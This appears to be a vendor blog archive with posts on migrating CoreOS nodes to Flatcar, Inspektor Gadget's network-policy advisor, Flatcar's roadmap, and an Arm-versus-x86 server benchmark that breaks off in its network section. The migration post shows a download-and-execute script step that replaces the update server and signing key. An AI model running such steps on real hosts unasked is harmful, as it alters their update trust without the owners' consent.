
Steps to Migrate from CoreOS to Flatcar Container Linux

Flatcar Container Linux is a drop-in replacement for CoreOS Container Linux, so one would expect the migration to be effortless. And it is.

Since Red Hat announced that CoreOS Container Linux will reach its end-of-life on May 26, we’ve seen a major uptick in the usage of Flatcar Container Linux. We’ve also had a number of questions about the migration process. This post highlights how to migrate to Flatcar Container Linux in two ways: modifying your deployment to install Flatcar Container Linux, and updating directly from CoreOS Container Linux.

Modifying your deployment to install Flatcar Container Linux

Changing your deployment is often a simple one-line change in your configuration. For example, if you’re deploying Flatcar Container Linux on AWS, you may only need to update the AMI you deploy. If you’re on bare metal, it may just be a change of the path to the images.

To make sure your migration is seamless, you should be aware of some small naming differences you might need to adjust for. We provide a set of migration notes to help you with this.

Updating directly into Flatcar Container Linux

You may be in a situation where updating directly into Flatcar Container Linux from an existing CoreOS Container Linux install works better for you. In this case, the process is also easy but different.

In this scenario, you want to change the update server that is being used and the corresponding signing keys to those used by Flatcar Container Linux.

We’ve captured the details in our guide to updating directly into Flatcar Container Linux. In that guide you’ll find this handy script that automates the process.

In short, it does these five steps:

  • fetch the new signing key and bind-mount it over the old one,
  • configure the new update server URL,
  • force an update by bind-mounting a dummy release file with version 0.0.0 over the old one,
  • restart the update engine service,
  • trigger an update.
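To illustrate the second step, the update-server switch amounts to writing a new update configuration. The sketch below is illustrative only, not the script itself; the GROUP/SERVER keys follow the Container Linux update.conf format, and the public Flatcar update server URL is taken from the Flatcar documentation. Verify both against the linked guide before use.

```python
# Hedged sketch of step 2: compose update.conf contents that point
# update_engine at Flatcar's public update server instead of CoreUpdate.
FLATCAR_UPDATE_SERVER = "https://public.update.flatcar-linux.net/v1/update/"

def flatcar_update_conf(group: str = "stable") -> str:
    """Return the contents to write to the node's update.conf."""
    return f"GROUP={group}\nSERVER={FLATCAR_UPDATE_SERVER}\n"

print(flatcar_update_conf(), end="")
```

The remaining steps (bind-mounting the key and dummy release file, restarting update-engine) require root on the node and are handled by the script.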

An example of using the script follows.

# To be run on the node via SSH
[email protected] ~ $ wget
[email protected] ~ $ chmod +x
[email protected] ~ $ ./
Done, please reboot now
[email protected] ~ $ sudo systemctl reboot

As Flatcar Container Linux uses the exact same update mechanisms as CoreOS Container Linux, rebooting the machine will have you in a Flatcar Container Linux environment, a familiar place for those coming from the CoreOS world.

As with the previous method, please heed the set of migration notes we provide.

That’s it

If you follow the simple steps above, your migration should go without a hitch. If you encounter problems, please let us know by filing an issue or getting in touch at [email protected].

Writing Kubernetes network policies with Inspektor Gadget’s Network Policy Advisor

At KubeCon EU 2016 in London, I gave a first talk about using BPF and Kubernetes together. I presented a proof of concept for introducing various degraded network scenarios in specific pods to test the reliability of apps. There were not many BPF + Kubernetes talks back then. In the meantime, Kinvolk has worked on various projects mixing Kubernetes and BPF together. The latest such project is our own Inspektor Gadget, a collection of “gadgets” for debugging and inspecting Kubernetes applications.

Today I would like to introduce Inspektor Gadget’s newest gadget that helps to write proper Kubernetes network policies.

Writing Kubernetes network policies easily

Securing your Kubernetes clusters is a task that involves many aspects: controlling what goes into your container images, writing RBAC rules for different users and services, etc. Here I focus on one important aspect: network policies.

At Kinvolk we regularly do security assessments of Kubernetes in the form of penetration testing for customers. Sometimes, the application is Kubernetes native and the network policies are developed at the same time as the application. This is ideal because the development team has a clear idea of which pod is supposed to talk to which pod. But sometimes, a pre-Kubernetes application is ported to Kubernetes and the developer tasked with writing the network policies may not have a clear idea of the architecture. Architecture documents might be missing or incomplete. Adding pod security as an afterthought might not be ideal, but thankfully the Network Policy Advisor in Inspektor Gadget can help us here.

The Network Policy Advisor workflow

A workflow we suggest to improve things is to deploy the application in a development cluster and let Inspektor Gadget monitor and analyse the network traffic so it can suggest network policies. The developer can then review the output and add the policies to the project.

We will use GoogleCloudPlatform’s microservices-demo application as an example. Its kubernetes-manifests.yaml contains various deployments and services but no network policies.

After preparing a “demo” namespace, let’s ask Inspektor Gadget to monitor the network traffic from this namespace:

$ kubectl gadget network-policy monitor \
        --namespaces demo \
        --output ./networktrace.log

While it’s running in the background, deploy the application in the demo namespace from another terminal:

$ wget -O network-policy-demo.yaml
$ kubectl apply -f network-policy-demo.yaml -n demo

Once the demo is deployed and running correctly, we can see all the pods in the demo namespace:

$ kubectl get pod -n demo
NAME                                     READY   STATUS    RESTARTS   AGE
adservice-58c85c77d8-k5667               1/1     Running   0          44s
cartservice-579bdd6865-2wcbk             0/1     Running   1          45s
checkoutservice-66d68cbdd-smp6w          1/1     Running   0          46s
currencyservice-65dd85f486-62vld         1/1     Running   0          45s
emailservice-84c98657cb-lqwfz            0/1     Running   2          46s
frontend-788f7bdc86-q56rw                0/1     Running   1          46s
loadgenerator-7699dc7d4b-j6vq6           1/1     Running   1          45s
paymentservice-5c54c9887b-prz7n          1/1     Running   0          45s
productcatalogservice-7df777f796-29lmz   1/1     Running   0          45s
recommendationservice-89547cff8-xf4mv    0/1     Running   1          46s
redis-cart-5f59546cdd-6rq8f              0/1     Running   2          44s
shippingservice-778db496dd-mhdk5         1/1     Running   0          45s

At this point, the different pods will have communicated with each other. The networktrace.log file contains one line per TCP connection with enough details to be able to infer network policies later on.

Let’s stop the network monitoring by Inspektor Gadget using Ctrl-C, and generate the Kubernetes network policies:

$ kubectl gadget network-policy report \
        --input ./networktrace.log > network-policy.yaml

Note: Here we are running Inspektor Gadget as a kubectl subcommand. You could also run it as a stand-alone binary using inspektor-gadget instead.

One of the network policies it creates is for the cartservice: Inspektor Gadget noticed that it received connections from the frontend and initiated connections to redis-cart. It displays the following suggestion accordingly:

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  creationTimestamp: null
  name: cartservice-network
  namespace: demo
spec:
  egress:
  - ports:
    - port: 6379
      protocol: TCP
    to:
    - podSelector:
        matchLabels:
          app: redis-cart
  ingress:
  - from:
    - podSelector:
        matchLabels:
          app: frontend
    ports:
    - port: 7070
      protocol: TCP
  podSelector:
    matchLabels:
      app: cartservice
  policyTypes:
  - Ingress
  - Egress

As you can see, it converted the set of connection tuples into a set of network policies using usual Kubernetes label selectors instead of IP addresses.
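Conceptually, the conversion can be pictured like this. The sketch below is a simplification with hypothetical field names, not Inspektor Gadget’s actual code or trace format:

```python
# Simplified sketch: turn observed TCP connection tuples into ingress/egress
# rule fragments keyed by pod labels. Field names are illustrative only.
def suggest_rules(connections, pod="cartservice"):
    ingress, egress = [], []
    for c in connections:
        if c["dst"] == pod:    # another pod connected to our pod
            ingress.append({"from": {"podSelector": {"matchLabels": {"app": c["src"]}}},
                            "port": c["port"]})
        elif c["src"] == pod:  # our pod initiated the connection
            egress.append({"to": {"podSelector": {"matchLabels": {"app": c["dst"]}}},
                           "port": c["port"]})
    return {"ingress": ingress, "egress": egress}

# Connections as observed for the cartservice in the demo above
observed = [
    {"src": "frontend",    "dst": "cartservice", "port": 7070},
    {"src": "cartservice", "dst": "redis-cart",  "port": 6379},
]
rules = suggest_rules(observed)
```

The real gadget additionally deduplicates connections and resolves pod IPs to labels before emitting the policy YAML.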

Of course, those automatically-produced network policies should not be used blindly: a developer should verify that the observed connections are legitimate. The Network Policy Advisor gadget has some limitations too (see #39), but it’s a lot easier to review the suggested policies and possibly make some small changes than to write them from scratch in a frustrating trial-and-error development cycle. This saves precious development time, and likely costs too.


Inspektor Gadget has useful features for developers of Kubernetes applications. As an Open Source project, contributions are welcome. Join the discussions on the #inspektor-gadget channel in the Kubernetes Slack or, if you want to know about our services related to pentesting and security, reach us at [email protected].

Flatcar Container Linux enters new era after CoreOS End-of-Life announcement

Almost two years ago, we launched Flatcar Container Linux, a drop-in replacement for CoreOS Container Linux. Since then, we’ve made almost 200 releases, added an experimental edge channel, released the Nebraska update server, (re-)introduced ARM support (which had been dropped by Red Hat), and introduced the Kinvolk Flatcar Container Linux Subscription.

But Flatcar Container Linux is about to enter a new era.

The New Era

Earlier this month, Red Hat announced that CoreOS Container Linux will reach its end of life on May 26th. This was something that had been expected since soon after the CoreOS acquisition was announced; everyone knew it was coming, but now we have dates.

For Flatcar Container Linux, this means the Kinvolk team will continue maintenance and development completely independently of upstream CoreOS. This is something we’ve been anticipating and preparing for, for some time. We have formed a strong OS and Security team, led by Thilo Fromm, previously the technical project manager responsible for AWS’s internal Linux efforts. That team is already building and testing the edge and alpha channels with updated packages and kernels compared to upstream CoreOS. Those updates will flow into the other channels following the usual alpha → beta → stable progression.

For users, a potentially more impactful date is September 1st, after which “published resources related to CoreOS Container Linux will be deleted or made read-only. OS downloads will be removed, CoreUpdate servers will be shut down, and OS images will be removed from AWS, Azure, and Google Compute Engine”.

This means not only that Flatcar Container Linux is the only way forward for current users of CoreOS Container Linux who want active maintenance and security updates, but also that they will have to make the switch before September.

The good news is that the migration to Flatcar is seamless. As many users — like the folks at Mettle — have already found out, the process can potentially amount to a simple one-line change.

Committed to the vision

We commit to staying true to the original purpose of CoreOS Container Linux: to provide a minimal and secure container OS with automated, atomic updates, available across all platforms, and supported for years to come. We believe, as CoreOS did, that providing a minimal surface area for attack and running the newest stable software are key aspects of systems security.

Flatcar Roadmap

While Red Hat has continued basic maintenance of CoreOS Container Linux, the reality is that, in terms of new features, the project has stagnated since the acquisition was announced. With its end of life imminent, it’s time to start looking forward.

We recently published our high-level plan for the next year. Some highlights on the way are

  • Stable ARM support (already in alpha),
  • Wider platform support,
  • cgroupv2 (hybrid-mode) as default,
  • Increased test coverage to guarantee stability,
  • and more.

In addition, we will also be deprecating legacy components such as the kubelet-wrapper and rkt.

A Linux Company

At Kinvolk, much of our work nowadays revolves around Kubernetes, and we expect that to continue for the foreseeable future. But we see ourselves first and foremost as a Linux company.

For us, the operating system is not a black box. We believe the only way to understand a system is to understand all parts of it, down to and including the OS.

We’ve built our team with this mindset. The Kinvolk team is composed of people who feel as comfortable doing Linux kernel or systemd development as they do when deploying a properly configured Kubernetes cluster. In fact, these are often skills found in single individuals.

An Open Source Company

Kinvolk is uncompromising in its dedication to making all our products fully open source. We believe that a fully open source enterprise stack is the ideal state for everyone. Our mission is to work towards that goal.

In the context of Flatcar Container Linux, we’ve already demonstrated this philosophy by providing a fully open source update server, Nebraska. This was one of the few parts of the system that CoreOS had never made available under an OSS license.


We are greatly indebted to the CoreOS team, and not only for giving the world the Container Linux concept: perhaps less well known, our founding project was working with CoreOS to develop rkt, the first alternative to the Docker container runtime, which led to the creation of the Open Container Initiative. That first project played a major role not just in the industry, but also in establishing Kinvolk’s reputation as a leader in Linux and container technologies.

It would not be an exaggeration to say that Kinvolk exists today because of the confidence CoreOS put in our team, and that is something for which we will always be grateful.

We are also grateful to the many folks within Red Hat and the community of CoreOS users and former employees who have been so supportive of our efforts with Flatcar, as well as to our enterprise customers who enable us to fund those efforts. This has been truly something special, and gives us faith that we can not just sustain but grow the community around Container Linux.

A base upon which we build

To conclude, we feel like we are in a unique position to continue the CoreOS legacy; a heavy burden we know. Flatcar Container Linux is the first phase of our plans. It provides the ideal base upon which, similar to CoreOS, we can apply our understanding of the Linux kernel and user space to make better systems.

Comparative Benchmark of Ampere eMAG, AMD EPYC, and Intel XEON for Cloud-Native Workloads


The Arm CPU architecture has a rich history – starting with home computers in the 1980s (as Acorn RISC Machines), then establishing itself in the 1990s as the dominant architecture for embedded devices, a role that continues today and into the foreseeable future thanks to smartphones. Cloud infrastructure based on the Arm CPU architecture, often seen as exotic only a decade ago, has become more and more generally available in recent years.

As Arm server and instance offerings become more and more ubiquitous in the public cloud, we at Kinvolk were keen to understand the drawbacks and benefits of those offerings for cloud-native applications. We assembled a set of system-level benchmark tests and added automation to execute them, aimed at gaining insight into the performance of fundamental platform features and functions. We then looked at one implementation in particular – the Ampere eMAG bare-metal servers offered by the Packet IaaS provider – to better understand how this platform compares to more traditional x86 architecture offerings powered by Intel and AMD CPUs. The tools we created are more general, though: these benchmarks can easily be run on any Kubernetes cluster, and even adding support for new architectures (MIPS, POWER, IA64, etc.) should be straightforward.

It should be noted that Kinvolk has an ongoing cooperation with both Ampere Computing and Packet, and used all infrastructure involved in our benchmarking free of charge. Ampere Computing furthermore sponsored the development of the control plane automation used to issue benchmark runs, collect the resulting data points, and produce charts.

We are releasing the automation for building the container images (so the same benchmarks can be run on multiple architectures), as well as the scripted automation to perform the benchmarks below, to the Open Source community at:


We had three goals going into this study:

  1. Provide an extendable benchmark framework that runs reproducible benchmarks and produces human-readable output (charts) for anyone to download and use.
  2. Identify a set of system-level tests that provide a thorough understanding of a system’s performance, and provide build automation and cloud-native packaging for different CPU architectures.
  3. Execute the above benchmark suite on a representative set of servers for selected CPU types, and deliver a comprehensive comparison which also discusses cost of operation.

Benchmark Targets

We selected similar Ampere, AMD, and Intel servers as offered by Packet.

We benchmarked the performance of

  • Ampere Computing’s eMAG CPU, 32 cores @3GHz (w/ 3.3 GHz TURBO)
  • AMD’s EPYC 7401P, w/ 24 cores/48 threads @2.2GHz (w/ 2.8 GHz TURBO)
  • Intel’s XEON 5120 x2, w/ 28 cores/56 threads @2.2GHz (w/ 3.2 GHz TURBO)

The server configuration details can be found on Packet’s website and are summarized below.

Packet server type: c2.large.arm – Lenovo ThinkSystem HR330A
  • Cost per hour: $1
  • CPU threads: 32 (32 physical cores, no SMT)
  • Clock speed: 3-3.3 GHz
  • RAM: 128 GB DDR4
  • Storage: 480 GB SSD
  • Software: Flatcar Container Linux Alpha, v2234; Kernel 4.19; Docker 18.06; Kubernetes 1.15.3

Packet server type: c2.medium.x86 – Dell PowerEdge r6415
  • Cost per hour: $1
  • CPU threads: 48 (24 physical cores)
  • Clock speed: 2.2-2.8 GHz (max 3 GHz single core)
  • Storage: 2 × 120 GB SSD, 2 × 480 GB SSD
  • Software: Flatcar Container Linux Stable, v2079 and v2247; Kernel 4.19; Docker 18.06; Kubernetes 1.15.3

Packet server type: m2.xlarge.x86 – Dell PowerEdge R640
  • Cost per hour: $2
  • CPU threads: 56 (28 physical cores)
  • Clock speed: 2.2-3.2 GHz
  • Storage: 2 × 120 GB SSD, 3.8 TB NVMe
  • Software: Flatcar Container Linux Stable, v2247; Kernel 4.19; Docker 18.06; Kubernetes 1.15.3

Network (all systems): Mellanox Technologies MT27710 Family [ConnectX-4 Lx] (two are present but only one is used)

Container Build Tooling (all systems): Alpine Linux 3.10, GCC 8.3, musl libc 1.1.22
The systems are of comparable hardware generations, but they do not have the same socket, CPU thread, and core counts, nor the same clock speeds. There are even bigger differences in how many cycles instructions need, and of course the big architectural difference between Arm and x86, which will be covered in the next section.

The amount of RAM and the types of SSDs and NVMe drives will not play a role in our benchmarks, but may have been factored into the price differences.

Ampere’s eMAG system is a bit smaller than the others, which may put it at a disadvantage in some benchmarks. It also has not been optimized for floating point and vector operations, but we benchmark those nonetheless.

Still, we think that the comparison of these three systems is valid, because it allows us to focus on the architectural differences and the different pricing.

Hardware Security

The benchmarks are run with all hardware side-channel mitigations enabled (as in Linux 4.19) to address vulnerabilities such as Spectre and Meltdown. However, Intel’s XEON uses Hyperthreading (SMT), and unless Hyperthreading is turned off, a whole class of side-channel vulnerabilities stays present, such as L1TF (Foreshadow) and MDS (Zombieload). AMD’s SMT architecture separates the CPU threads on a core more strictly than Intel’s, and is therefore not affected by many of these side-channel vulnerabilities. (You can check this on your systems by running spectre-meltdown-checker and looking for reports that mention “SMT vulnerable”.) The recommendation for Intel is to turn off Hyperthreading when running untrusted code on the server. OpenBSD even disabled SMT/Hyperthreading by default on all systems, since ongoing and future research may affect AMD, too. We therefore include benchmark results that utilize not all CPU threads but only all physical cores. The additional benefit, besides performance numbers with security in mind, is that we can see whether Hyperthreading benefits a particular workload at all.

Arm and x86 architecture

Before we dive into discussing the specific system/cluster metrics we’re interested in and the tools to deliver those metrics, let’s address the elephant in the room: When coming from an x86 world, going Arm implies supporting a significantly different CPU architecture. It’s not just the mnemonics that are all different – Arm CPU instructions also use a 3-address (or 3-register) instruction set (mul r0, r1, r2 multiplies the values of R1 and R2, and stores the result in R0), while x86 is limited to 2 addresses (imul eax, ebx multiplies EAX by EBX, and stores the result in EAX). The way instructions and data are structured in memory is fundamentally different, too – Arm follows a Harvard architecture approach, where instructions and data are stored in separate memories, while x86 implements a von Neumann architecture, mixing data and instructions at least at the macro-code level (the existence of separate L1 “data” and “instruction” caches hints at Intel using a Harvard architecture at the microcode level, storing micro-ops in L1 caches).

However, the significant time we have spent with cloud-native applications on both x86 and Arm – including working with our Flatcar Container Linux OS and Lokomotive Kubernetes distribution on both, not least during the course of developing our benchmarking automation for this report – demonstrated to us that at the cloud-native level, those differences disappear, abstracted away by Kubernetes’ runtime and per-architecture container images. In our experience, neither the technological effort nor the implicit business risk of creating or packaging cloud-native apps differs significantly between Arm and x86.

In summary, and factoring in our experience of operating cloud-native workloads on both CPU architectures, we feel that Arm has become a commodity, even though it’s sometimes not yet treated as such by developers and operators. Whether a specific cloud-native application runs on nodes that happen to be powered by an Arm CPU, on nodes driven by x86, or on a hybrid mix of those, is not a significant factor, because of the level of abstraction provided. During our explorations we also looked at legacy (monolithic) applications being ported into a cloud-native environment, and found that a similar pattern applies: new microservice infrastructure, carefully added while porting legacy apps to cloud-native environments, does away with the old paradigm of depending on a single CPU architecture, and cluster runtime abstraction makes the previous differences disappear.

Metrics, Benchmark Tools, and Test Set-Up

In order to understand performance differences when running cloud-native applications on Arm, AMD, and Intel CPUs, we considered a range of metrics for the system-level functions which form the foundation of the runtime environment that cloud-native applications perform in. We started with basic hardware properties like raw CPU calculation performance, memory I/O, and network performance, to provide an overview of what to expect and where to take a closer look. We then extended our investigations into more complex OS performance characteristics, like threading, scheduling, and lock performance, which make up the most fundamental runtime infrastructure for both the Kubernetes control plane and cloud-native workloads. Ultimately, following observations made during the lower-level benchmarks, we focused on a number of cloud-native components that are used in the majority of cloud-native architectures – HTTP server and object store in particular.

Specifically, we use the following benchmark tools to get hardware performance metrics:

  • stress-ng and sysbench for CPU and memory I/O workloads
  • iperf3 for network performance

For generating OS-level metrics, we used:

  • stress-ng for shared memory, locks, and threading performance
  • sysbench for the OS’ virtual filesystem (VFS) layer performance

In addition to the above hardware- and system-level benchmarks, we used the following cloud-native applications (which are modules with widespread use in existing cluster deployments):

  • memcached as a multi-threaded key-value store
  • redis as a single-threaded key-value store (launched with multiple, independent instances to saturate a whole node’s CPUs)
  • nginx as an HTTP server

We used Redis’ excellent memtier_benchmark tool for generating metrics on both key-value stores; ab, fortio, and wrk2 (which we have past experience with, from our service mesh benchmarking) are used to benchmark NGINX.

The build automation for the tools discussed above is available as open source/free software from our GitHub repo, allowing for straightforward reproduction of the container images we used for benchmarking, but you can also get the built images on

NOTE that the benchmark container images are based on Alpine Linux, which uses the musl C library instead of glibc. This allows us to rigorously optimize for size and speed. All code is compiled with GCC 8.3.0.

Kubernetes Stack, Reproducibility and Extendability

We provisioned the Kubernetes clusters we used to run our benchmarks with our Lokomotive Kubernetes distribution, and used Flatcar Container Linux as the underlying operating system. Both are fully open source and available for everybody to reproduce our benchmarks, and to extend our work by running their own.

Instructions for the (largely automated) provisioning of test clusters are provided in our benchmark containers repository, as is our scripted automation for running the benchmarks. This also allows others to improve and to extend on our work.

NOTE: The default QoS class for pods in Kubernetes is BestEffort. The default CPU shares setting for BestEffort is too limiting to utilize the full hardware, because the value is 2 instead of the default 1024. Therefore, we set the CPU request of the benchmark pods to 1, which results in the Burstable QoS class with a CPU shares value of 1024.
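The CPU-share arithmetic behind this note can be sketched as follows; the 1024-shares-per-core conversion and the minimum of 2 follow Kubernetes’ cgroup v1 mapping:

```python
def cpu_shares(request_cores=None):
    """Map a pod's CPU request (in cores) to a cgroup v1 cpu.shares value,
    following Kubernetes' conversion of 1024 shares per requested core.
    A pod with no request (BestEffort) gets the minimum value of 2."""
    if request_cores is None:
        return 2                          # BestEffort: barely any CPU weight
    return max(2, int(request_cores * 1024))
```

So a benchmark pod with a CPU request of 1 competes with weight 1024 instead of 2, which is why we set that request.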

Basic setup

We benchmarked three server types. For each server type we provisioned a cluster where this server type is the worker node to run the benchmark pods.

Networking setup

We use Calico as the Kubernetes network plugin. Calico gives each pod, i.e., our benchmark container, a virtual IP from an IP-in-IP overlay network. Since this IP-in-IP encapsulation introduces an overhead, our cloud-native benchmark diverges from a hardware-oriented benchmark: instead of measuring node-to-node network performance, we look at pod-to-pod network performance.
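The encapsulation overhead is easy to quantify: IP-in-IP wraps each packet in one extra 20-byte IPv4 header, slightly reducing the payload each MTU-sized frame can carry. A back-of-the-envelope sketch (assuming a standard 1500-byte Ethernet MTU and ignoring TCP/inner-protocol headers):

```python
MTU = 1500       # typical Ethernet MTU, in bytes
IPV4_HDR = 20    # bytes; IP-in-IP adds one extra IPv4 header per packet

def payload_per_packet(mtu=MTU, encapsulated=True):
    """Bytes left for payload after IP headers: outer + inner when
    IP-in-IP encapsulated, inner only otherwise."""
    headers = IPV4_HDR * (2 if encapsulated else 1)
    return mtu - headers

overhead = 1 - payload_per_packet() / payload_per_packet(encapsulated=False)
print(f"{overhead:.2%}")  # relative payload loss of the extra header, 1.35%
```

In practice the effect on iperf3 throughput is in this low single-digit percent range, plus the CPU cost of encapsulation itself.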

For network benchmarks a second worker node is needed. We decided to measure the network performance as observed from a fixed client system. The final benchmark architecture for network performance can be seen in the following diagram.

Multiple Data Points and Statistical Robustness

As we are using the datacenters of a public cloud provider – Packet – to run our benchmarks, we have no control over which specific servers are picked for individual provisionings. The age of a machine and its components (memory, CPU, etc.), its position in the datacenter relative to the other cluster nodes (same rack? same room? same fire zone?) for network testing, and the state of the physical connections between the nodes all have an impact on the raw data any individual test run produces. The activity of other servers that are completely unrelated to our tests, but present in the same datacenter and sharing the same physical network resources, might have a detrimental effect on iperf and nginx in particular, leading to noisy benchmark data.

To counter this, we apply sufficient statistical spread, with multiple samples per data point, to eliminate both the volatile effects of outside operations and the aging/wear effects of the hardware that makes up our test nodes. We furthermore use multiple clusters in different datacenters, with implicitly different placement layouts, to help us draw conclusions from our data with more confidence.

In order to achieve sufficient statistical spread, we execute individual benchmark runs multiple times and derive averages, minima, and maxima. Using multiple clusters of identical setup also ensures that our capacity does not include a “lemon” server (degraded hardware) or a bad switch, and lets us detect outliers, like nodes placed at remote corners of the datacenter impacting network tests.

Overall we ran benchmark tests in 2 regions in parallel, repeating each benchmark in 15 iterations. For each of the CPUs in each chart presented, we calculated the mean of the data points, and provided min-max bars to display the variance.
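The per-chart aggregation described above is straightforward; a minimal sketch:

```python
def aggregate(samples):
    """Collapse repeated benchmark runs into the values plotted per CPU:
    the bar height (mean) and the min/max whiskers."""
    mean = sum(samples) / len(samples)
    return {"mean": mean, "min": min(samples), "max": max(samples)}

# e.g. 15 iterations x 2 regions = 30 samples per data point
```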

Benchmark runs and observations

In this section, we discuss the results achieved by Ampere’s eMAG, AMD’s EPYC, and Intel’s XEON. Apart from looking at raw benchmark results, we also consider the cost of operation – in this case, the cost of benchmarking – based on the hourly rates offered by Packet. This implies the assumption that Packet prices server types at rates that reflect their cost of acquisition and operation:

  • Ampere’s eMAG is priced at $1/h; cost-operation values have a scaling factor of 1
  • AMD’s EPYC is also priced at $1/h; cost-operation values have a scaling factor of 1
  • Intel’s XEON is priced at $2/h; cost-operation values have a scaling factor of 0.5
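The cost-performance values in the charts follow directly from these rates: performance per dollar is the raw result divided by the hourly price, which is equivalent to multiplying by the scaling factor above. A sketch:

```python
PRICE_PER_HOUR = {"eMAG": 1.0, "EPYC": 1.0, "XEON": 2.0}  # $/h, as listed above

def perf_per_dollar(cpu, raw_score):
    """Normalize a raw benchmark score by the server's hourly price."""
    return raw_score / PRICE_PER_HOUR[cpu]

# A XEON score is halved relative to its raw value (scaling factor 0.5),
# while eMAG and EPYC scores are unchanged (scaling factor 1).
```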

All benchmarks run in 3 configurations:

  • Multi-threaded, with the thread count equal to the number of CPU threads in the system. For Ampere Computing’s eMAG this does not change anything, as the CPU does not implement hyperthreading.
  • Multi-threaded, with the thread count equal to the number of physical cores in the system. This is a good reference point for x86 systems that need hyperthreading turned off to protect against Spectre-class hardware vulnerabilities such as MDS and L1TF.
  • Single-threaded, to benchmark the performance of a single physical core.
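Given the CPU specs from the “Benchmark Targets” section, the thread counts used per configuration are simply:

```python
CPUS = {  # (physical cores, hardware threads), from the server specs above
    "eMAG": (32, 32),   # no hyperthreading: threads == cores
    "EPYC": (24, 48),
    "XEON": (28, 56),
}

def benchmark_thread_counts(cpu):
    """Thread counts for the three run configurations:
    all hardware threads, all physical cores, and a single thread."""
    cores, threads = CPUS[cpu]
    return [threads, cores, 1]
```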

The result charts are laid out accordingly:

Raw Performance Performance per $
[ Chart for hyperthreads performance ] [ hyperthreads performance per dollar ]
[ Chart for physical cores performance ] [ physical cores performance per dollar ]
[ Chart for single core performance ] [ single threaded performance per dollar ]

The big bars show the mean of the results, the small overlay bars show the distance to minima and maxima of the results.

Hardware-level Benchmarks

CPU speed and Memory I/O rates

We use the following tests for stressing CPUs and Memory I/O:

From sysbench:

  • memory (multi-threaded memory writes, raw throughput rates in MB/s)
  • cpu (float-heavy prime number generation)

From stress-ng:

  • vecmath (128-bit integer vector math operations w/ 8, 16, 32, and 64 bit vector values)
  • matrix (floating point matrix operations – add, sub, mul, div, dot product, etc.)
  • memcpy, which also stresses caches (copy 2 MB of memory, then mem-move with 3 different alignments)

Disclaimer: As noted in the system specifications above, Ampere’s eMAG is not optimized for floating point and vector operations. As these operations are present in many different workloads anyway, we think it’s beneficial to measure the current performance, even if future versions of the hardware may perform better.


The benchmark pods run on the Kubernetes worker node with a run length of 30 seconds and multiple iterations directly after each other. Here are the effective command lines for the linked container images; the thread count is varied from the number of CPU threads, to the number of physical cores, to a single thread:

sysbench --threads=$PARAMETER --time=30 memory --memory-total-size=500G run
sysbench --threads=$PARAMETER --time=30 cpu run
stress-ng --(vecmath|matrix|memcpy) $PARAMETER --timeout 30s --metrics-brief


Memory-heavy workloads – multi-threaded applications that change large amounts of RAM in brief amounts of time, like in-memory databases and key-value stores, run extremely well on Ampere’s eMAG. Both AMD’s EPYC and Intel’s XEON run into memory bus contention issues when many threads/processes try to access memory at the same time. eMAG displays impressive vertical scalability with many-threaded memory I/O, allowing for running a high number of processes (for instance, pods) without impacting individual memory data rates.

For some compute-intensive benchmarks – mainly integer and floating point micro-benchmarks of the stress-ng suite – we found AMD’s EPYC in the lead, both with raw performance as well as with cost-performance ratio. Ampere’s eMAG matches or exceeds EPYC performance in the more generic cpu benchmark of the sysbench suite, and generally offers a good cost/performance ratio over Intel’s XEON.

sysbench memory

In multi-thread benchmarks of raw memory I/O we found a clear performance leader in Ampere’s eMAG, outperforming both AMD’s EPYC and Intel’s XEON CPUs by a factor of 6 or higher. We believe that many-thread memory I/O leads to a high amount of memory bus contention on both Intel and AMD, while Arm has an architectural advantage over both x86s.

Raw Performance
Performance per $

sysbench cpu

In the floating-point heavy CPU benchmark, Ampere’s eMAG leads the field both in raw performance and regarding cost-per-operation when multiple threads are involved, with AMD’s EPYC in a close lead regarding raw single-thread performance. There is no noticeable performance gain from EPYC’s hyperthreading, suggesting that this benchmark utilizes CPU resources that cannot be shared between the siblings of a hyperthread. The varying minimum and maximum performance when the thread count equals the CPU thread count for AMD and Intel comes from the scheduling differences when two hyperthreads access the same core resources.

Raw Performance
Performance per $

stress-ng vecmath

In the integer vector operations micro-benchmark, AMD’s EPYC and Intel’s XEON lead the race performance-wise, with AMD ahead on cost-per-cycle. Ampere’s eMAG offers a performance-per-dollar ratio similar to Intel’s XEON.

Raw Performance
Performance per $

stress-ng matrix

Similar to the integer performance above, AMD’s EPYC and Intel’s XEON lead in stress-ng’s matrix floating-point operations performance-wise, with a better cost-per-cycle ratio for AMD. Ampere’s eMAG offers a performance-per-dollar ratio on par with Intel’s XEON. The strong variance between minimal and maximal XEON performance comes from scheduling differences when resources of a core are accessed that cannot be shared by hyperthreads.

Raw Performance
Performance per $

stress-ng memcpy

In the memcopy benchmark, which is designed to stress both memory I/O as well as caches, Intel’s XEON shows the highest raw performance, and AMD’s EPYC comes in last. Ampere’s eMAG leads the field – with a small margin over Intel’s XEON – when cost is factored in. We suspect alignment issues to be the main cause of the Ampere eMAG’s lower performance in this benchmark when compared to sysbench’s memory I/O benchmark above.

Raw Performance
Performance per $

Network Performance

We use iperf3 to run single- and multi-connection network performance tests. The program follows the select server design where a single thread handles all connection syscalls. The Linux kernel network stack still takes advantage of multiple CPUs.

Network testing used an Intel XEON node as the networking peer (client) in each cluster, so the iperf3 benchmark below was performed between XEON↔XEON, EPYC↔XEON, and eMAG↔XEON. We used a XEON client because of the generally good network performance of this platform.

The client receives data over TCP from the benchmarked nodes, which run the iperf3 server. Since we run on Kubernetes, this means a pod-to-pod connection over Calico’s IP-in-IP overlay network. The iperf3 client was started with 56 TCP connections in all cases (the number of CPU threads on the fixed XEON client).

Because we cannot control the number of kernel threads of the network stack that the iperf server will use, we turned Hyperthreading off instead of simulating it by fixing the thread count to the number of cores as before. This was done by running this on the node:

sudo sh -c 'echo off > /sys/devices/system/cpu/smt/control'


The benchmark has a run length of 30 seconds and multiple iterations directly after each other.

The effective command line for the linked containers is as follows; the parameter sets the connection count to 56 or 1:

Benchmarked worker node with server pod: iperf3 -s
Fixed XEON worker node with client pod: iperf3 -P $PARAMETER -R -c $POD_IP --time 30


AMD’s EPYC excels in raw network performance and therefore in cost/performance, too. Ampere’s eMAG offers lower throughput jitter, and a better cost/performance ratio, than Intel’s XEON.

Note again that this is pod-to-pod traffic. Node-to-node traffic has no problem saturating the 10G line rate on all systems. The testing here highlighted that some areas need optimization for better network performance on Kubernetes with Calico’s IP-in-IP overlay network.
We did not test a node-to-node setup with 100G NICs but results collected in other environments show that Ampere’s eMAG is capable of saturating a 100G line-rate (as are the other systems).
Based on the findings here, we expect software optimizations to come that will improve the eMAG performance.

Raw Performance – Hyperthreading ON
Performance per $ – Hyperthreading ON
